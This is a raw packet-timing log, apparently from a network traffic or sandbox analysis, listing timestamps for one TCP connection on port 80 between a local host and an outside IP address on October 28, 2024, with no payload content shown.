                                                                                                                                                              Oct 28, 2024 19:46:22.848208904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848225117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848241091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848242044 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848258018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848269939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848274946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848295927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848304033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848335981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848539114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848555088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848571062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848586082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848592043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848603964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848618984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848628044 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848635912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848651886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848665953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848669052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848689079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848783970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848825932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848860979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848876953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848920107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848968029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848984003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849000931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849015951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849029064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849056959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849245071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849261045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849277973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849294901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849302053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849312067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849328041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849339962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849344015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849360943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849369049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849375963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849400997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.903233051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.953860044 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959472895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959528923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959563017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959589005 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959634066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959669113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959685087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959721088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959767103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959772110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959808111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959840059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959856033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959955931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960007906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960009098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960042000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960076094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960103989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960109949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960144043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960164070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960177898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960211039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960227966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960268021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960300922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960315943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960336924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960386038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960388899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960438967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960470915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960481882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960505962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960556030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960558891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960593939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960639954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960644960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960678101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960714102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960726976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960747957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960782051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960798979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960817099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960850000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960867882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960885048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960939884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960958004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960992098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961026907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961040974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961091042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961123943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961142063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961158037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961193085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961205006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961328983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961361885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961374998 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961396933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961431026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961445093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961464882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961498022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961512089 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961533070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961576939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961646080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961678982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961714029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961731911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961745977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961780071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961797953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961813927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961848021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961860895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961882114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961925983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961934090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961967945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962002993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962018013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.962038040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962070942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962083101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.962105989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962141037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962157011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.962260962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962304115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962310076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.962338924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962372065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962389946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.962404966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962439060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962451935 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.962472916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962523937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.962589979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962652922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962692022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962702990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.962771893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962805986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962817907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.962841034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962876081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.962892056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.963042974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963076115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963100910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.963108063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963143110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963156939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.963177919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963223934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.963228941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963264942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963298082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963318110 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.963352919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963387966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963406086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.963419914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963454962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963468075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.963793039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.963845015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.963906050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964004993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964040041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964051008 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964073896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964118004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964123964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964159012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964194059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964209080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964226961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964262009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964276075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964333057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964365959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964384079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964400053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964432955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964451075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964467049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964499950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964509010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964534044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964570999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964586020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964606047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964642048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964658976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964674950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964724064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964754105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964786053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964819908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964829922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964868069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964901924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964920044 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.964934111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.964971066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965002060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965034962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965068102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965080976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965102911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965142012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965152979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965178013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965226889 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965281963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965334892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965368986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965378046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965478897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965512991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965533972 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965547085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965580940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965599060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965615988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965661049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965667009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965698957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965734005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965751886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965768099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965802908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965817928 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965853930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965888977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965900898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965923071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965956926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.965967894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.965991020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.966023922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.966041088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.966314077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.966366053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.966377974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.966418982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.966454029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.966465950 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.966486931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.966528893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.171463966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177153111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177217007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177268028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177273989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177309036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177344084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177355051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177376032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177416086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177444935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177495003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177529097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177539110 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177561998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177596092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177608013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177628994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177661896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177674055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177712917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177747011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177761078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177784920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177819014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177829981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177870035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177903891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177915096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177956104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178003073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178003073 CET8049726166.1.160.211192.168.2.16
